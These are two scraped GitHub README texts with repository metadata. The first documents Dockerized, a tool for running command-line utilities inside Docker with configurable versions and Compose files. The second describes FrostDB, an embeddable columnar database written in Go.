dockerized <command> Examples : bash dockerized node --version # v16.13.0 dockerized vue create new-project # create a project with vue cli dockerized tsc --init # initialize typescript for the current directory dockerized npm install # install packages.json See CLI Reference for all options. Use Cases Quickly try out command line tools without the effort of downloading and installing them. Installing multiple versions of node/python/typescript. You need unix commands on Windows. You don't want to pollute your system with a lot of tools you don't use. Easily update your tools. Ensure everyone on the team is using the same version of commandline tools. Design Goals All commands work out of the box. Dockerized commands behave the same as their native counterparts. Files in the current directory are accessible using relative paths. Cross-platform: Works on Linux, MacOS, and Windows (CMD, Powershell, Git Bash). Suitable for ad-hoc usage (i.e. you quickly need to run a command, that is not on your system). Configurability: for use within a project or CI/CD pipeline. Switching command versions Ad-hoc Add :<version> to the end of the command to override the version. shell dockerized node:15 Listing versions To see which versions are available, run: ```shell dockerized node:? or dockerized node: ``` Environment Variables Each command has a <COMMAND>_VERSION environment variable which you can override. python → PYTHON_VERSION node → NODE_VERSION tsc → TSC_VERSION npm → NODE_VERSION ⚠ npm's version is determined by node. See .env for a list of configurable versions. Global Create a dockerized.env file in your home directory for global configuration. ```shell dockerized.env (example) NODE_VERSION=16.13.0 PYTHON_VERSION=3.8.5 TYPESCRIPT_VERSION=4.6.2 ``` Per project (directory) You can also specify version and other settings per directory and its subdirectory. This allows you to "lock" your tools to specific versions for your project. Create a dockerized.env file in the root of your project directory. All commands executed within this directory will use the settings specified in this file. Ad-hoc (Unix) Override the environment variable before the command, to specify the version for that command. shell NODE_VERSION=15.0.0 dockerized node Ad-hoc (Windows Command Prompt) Set the environment variable in the current session, before the command. cmd set NODE_VERSION=15.0.0 dockerized node Customization Dockerized uses Docker Compose to run commands, which are defined in a Compose File. The default commands are listed in docker-compose.yml . You can add your own commands or customize the defaults, by loading a custom Compose File. The COMPOSE_FILE environment variable defines which files to load. This variable is set by the included .env file, and your own dockerized.env files, as explained in Environment Variables . To load an additional Compose File, add the path to the file to the COMPOSE_FILE environment variable. Including an additional Compose File Globally To change global settings, create a file dockerized.env in your home directory, which loads an extra Compose File. In this example, the Compose File is also in the home directory, referenced relative to the ${HOME} directory. The original variable ${COMPOSE_FILE} is included to preserve the default commands. Omit it if you want to completely replace the default commands. ```bash ~/dockerized.env COMPOSE_FILE="${COMPOSE_FILE};${HOME}/docker-compose.yml" ``` ```yaml ~/docker-compose.yml ``` Per Project To change settings within a specific directory, create a file dockerized.env in the root of that directory, which loads the extra Compose File. ${DOCKERIZED_PROJECT_ROOT} refers to the absolute path to the root of the project. ```shell ./dockerized.env COMPOSE_FILE="${COMPOSE_FILE};${DOCKERIZED_PROJECT_ROOT}/docker-compose.yml" ``` ```yaml ./docker-compose.yml ``` Adding custom commands After adding your custom Compose File to COMPOSE_FILE , you can add your own commands. ```yaml docker-compose.yml version: "3" services: du: image: alpine entrypoint: ["du"] ``` Now you can run dockerized du to see the size of the current directory. To learn how to support versioning, see Development Guide: Configurable Version . You can also mount a directory to the container: ```yaml docker-compose.yml version: "3" services: du: image: alpine entrypoint: ["du"] volumes: - "${HOME}/.config:/root/.config" - "${DOCKERIZED_PROJECT_ROOT}/foobar:/foobar" ``` Make sure host volumes are absolute paths . For paths relative to home and the project root, you can use ${HOME} and ${DOCKERIZED_PROJECT_ROOT} . It is possible to use relative paths in the service definitions, but then your Compose File must be loaded before the default: COMPOSE_FILE=${DOCKERIZED_PROJECT_ROOT}/docker-compose.yml;${COMPOSE_FILE} . All paths are relative to the first Compose File. Compose Files are also merged in the order they are specified, with the last Compose File overriding earlier ones. Because of this, if you want to override the default Compose File, you must load it before your file, and you can't use relative paths. To keep compatibility with docker-compose, you can specify a default value for DOCKERIZED_PROJECT_ROOT , for example: ${DOCKERIZED_PROJECT_ROOT:-.} sets the default to . , allowing you to run like this as well: docker-compose --rm du -sh /foobar . To customize existing commands, you can override or add properties to the services section of the Compose File, for the command you want to customize. For example, this is how to set an extra environment variable for dockerized aws : ```yaml docker-compose.yml version: "3" services: aws: environment: AWS_DEFAULT_REGION: "us-east-1" ``` If you'd like to pass environment variables directly from your dockerized.env file, you can expose the variable as follows: ```bash dockerized.env AWS_DEFAULT_REGION="us-east-1" ``` ```yaml docker-compose.yml version: "3" services: aws: environment: AWS_DEFAULT_REGION: "${AWS_DEFAULT_REGION}" ``` For more information on extending Compose Files, see the Docker Compose documentation: Multiple Compose Files . Note that the extends keyword is not supported in the Docker Compose version used by Dockerized. Localhost Dockerized applications run within an isolated network. To access services running on your machine, you need to use host.docker.internal instead of localhost . shell dockerized telnet host.docker.internal 8080 # instead of telnet localhost 8080 Limitations It's not currently possible to access parent directories. (i.e. dockerized tree ../dir will not work) Workaround: Execute the command from the parent directory. (i.e. cd .. && dockerized tree dir ) Commands will not persist changes outside the working directory, unless specifically supported by dockerized .;Run popular commandline tools within docker;[]
datastack-net/dockerized
polarsignals/frostdb;This project is still in its infancy, consider it not production-ready, probably has various consistency and correctness problems and all API will change! FrostDB is an embeddable wide-column columnar database written in Go. It features semi-structured schemas, uses Apache Parquet for storage, and Apache Arrow at query time. Building on top of Apache Arrow, FrostDB provides a query builder and various optimizers (using DataFrame-like APIs). FrostDB is optimized for use cases where the majority of interactions are writes, with occasional analytical queries over this data. FrostDB was built specifically for Parca for Observability use cases. Read the announcement blog post to learn about what made us create it: https://www.polarsignals.com/blog/posts/2022/05/04/introducing-arcticdb/ (FrostDB was originally called ArcticDB) Why you should use FrostDB Columnar data stores have become incredibly popular for analytics. Structuring data in columns instead of rows leverages the architecture of modern hardware, allowing for efficient processing of data. A columnar data store might be right for you if you have workloads where you write a lot of data and need to perform analytics on that data. FrostDB is similar to many other embeddable columnar databases such as DuckDB FrostDB may be a better fit for you if: - Are developing a Go program - Want to embed a columnar database in your program instead of running a separate database server - Have immutable datasets that don't require updating or deleting - Your data contains dynamic columns, where the number of columns in the schema may increase at runtime FrostDB is likely not suitable for your needs if: - You aren't developing in Go - You require a standalone database server - You need to modify or delete your data - You query by rows instead of columns Getting Started You can explore the examples directory for sample code using FrostDB. Below is a snippet from the simple database example. It creates a database with a dynamic column schema, inserts some data, and queries it back out. https://github.com/polarsignals/frostdb/blob/ee6970eff139c58a45998a87c02b661f32be5cbe/examples/simple/simple.go#L17-L69 Design choices FrostDB was specifically built for Observability workloads. This resulted in several characteristics that make it unique. Table Of Contents: Columnar Layout Dynamic Columns Immutable & Sorted Snapshot isolation Columnar layout Observability data is most useful when it is highly dimensional and those dimensions can be searched and aggregated by efficiently. Contrary to many relational databases (MySQL, PostgreSQL, CockroachDB, TiDB, etc.) that store data all data belonging to a single row together, a columnar layout stores all data of the same column in one contiguous chunk of data, making it very efficient to scan and aggregate data for any column. FrostDB uses Apache Parquet for storage, and Apache Arrow at query time. Apache Parquet is used for storage to make use of its efficient encodings to save on memory and disk space. Apache Arrow is used at query time as a foundation to vectorize the query execution. Dynamic Columns While columnar databases already exist, most require a static schema. However, Observability workloads differ in that data their schemas are not static, meaning not all columns are pre-defined. Wide column databases already exist, but typically are not strictly typed (e.g. document databases), and most wide-column databases are row-based databases, not columnar databases. Take a Prometheus time-series for example. Prometheus time-series are uniquely identified by the combination of their label-sets: http_requests_total{path="/api/v1/users", code="200"} 12 This model does not map well into a static schema, as label-names cannot be known upfront. The most suitable data-type some columnar databases have to offer is a map, however, maps have the same problems as row-based databases, where all values of a map in a row are stored together, resulting in an inability to exploit the advantages of a columnar layout. A FrostDB schema can define a column to be dynamic, causing a column to be created on the fly when a new label-name is seen. A FrostDB schema for Prometheus could look like this: go type Prometheus struct { Labels map[string]string `frostdb:",rle_dict,asc(1),null_first"` Timestamp int64 `frostdb:",asc(0)"` Value float64 } Note: We are aware that Prometheus uses double-delta encoding for timestamps and XOR encoding for values. This schema is purely an example to highlight the dynamic columns feature. With this schema, all rows are expected to have a timestamp and a value but can vary in their columns prefixed with labels. . In this schema all dynamically created columns are still Dictionary and run-length encoded and must be of type string . Immutable There are only writes and reads. All data is immutable. FrostDB maintains inserted data in an Log-structured merge-tree(LSM) like index. This index is implemented as lists of Parts. A Part containers either an Arrow record or a Parquet file. The first level (L0) contains a list of Arrrow records inserted as-is into the list. Upon reaching the maximum configured size of the level the level will be compacted into a single Parquet file and added to the next level of the index. This process continues for each configured level of the index until a file is written into the final level of the index. Upon the size of the entire index reaching the configured max in-memory size the index is rotated out. It can be either configured to be dropped entirely or to be written out to your storage of choice. At query time FrostDB will scan each part in the in the index. To maintain fast queries FrostDB leverages the sparse index features of Parquet files, such as bloom filters and min and max values of columns in each row group such that only the row groups that contain data that can satisfy the query are processed. Snapshot isolation FrostDB has snapshot isolation, however, it comes with a few caveats that should be well understood. It does not have read-after-write consistency as the intended use is for users reading data that are not the same as the entity writing data to it. To see new data the user re-runs a query. Choosing to trade-off read-after-write consistency allows for mechanisms to increase throughput significantly. FrostDB releases write transactions in batches. It essentially only ensures write atomicity and that writes are not torn when reading. Since data is immutable, those characteristics together result in snapshot isolation. More concretely, FrostDB maintains a watermark indicating that all transactions equal and lower to the watermark are safe to be read. Only write transactions obtain a new transaction ID, while reads use the transaction ID of the watermark to identify data that is safe to be read. The watermark is only increased when strictly monotonic, consecutive transactions have finished. This means that a low write transaction can block higher write transactions to become available to be read. To ensure progress is made, write transactions have a timeout. This mechanism is inspired by a mix of Google Spanner , Google Percolator and Highly Available Transactions . Acknowledgments FrostDB stands on the shoulders of giants. Shout out to Segment for creating the incredible parquet-go library as well as InfluxData for starting and various contributors after them working on Go support for Apache Arrow .;❄️ Coolest database around 🧊 Embeddable column database written in Go.;database,columnar-storage,apache-arrow,apache-parquet,golang
polarsignals/frostdb